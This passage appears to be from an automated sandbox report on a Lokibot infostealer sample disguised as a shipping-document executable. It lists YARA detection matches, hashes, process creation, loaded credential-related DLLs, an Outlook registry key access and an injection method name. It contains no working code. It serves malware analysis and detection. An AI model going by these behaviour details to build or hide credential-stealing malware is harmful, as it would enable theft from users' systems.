                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                        Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                        Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 5516, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 6536, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xlI4iAklxGArgVrnMs.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xlI4iAklxGArgVrnMs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xlI4iAklxGArgVrnMs.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, StL8WvaNclbdmwJqfH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, StL8WvaNclbdmwJqfH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xlI4iAklxGArgVrnMs.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xlI4iAklxGArgVrnMs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xlI4iAklxGArgVrnMs.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7b70000.10.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.3126898.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.33482b8.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.31164f8.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/8@0/1
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_0040650A
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,3_2_0040434D
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeMutant created: NULL
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5516
                        Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\3c265893-1c16-49b6-8ac8-aac60de7ee2bJump to behavior
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess created: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess created: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5516 -s 1376
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess created: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess created: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: mscorlib.pdbMZ source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Data.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Xml.ni.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: Accessibility.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: UHN.pdbO source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Configuration.ni.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Data.ni.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Configuration.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: UHN.pdbSHA256Q source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                        Source: Binary string: System.Xml.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Core.ni.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Windows.Forms.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: mscorlib.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: UHN.pdb source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Drawing.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Core.pdb< source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Data.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Core.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: Accessibility.pdbMZ source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.ni.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Data.pdb, source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr

                        Data Obfuscation

                        barindex
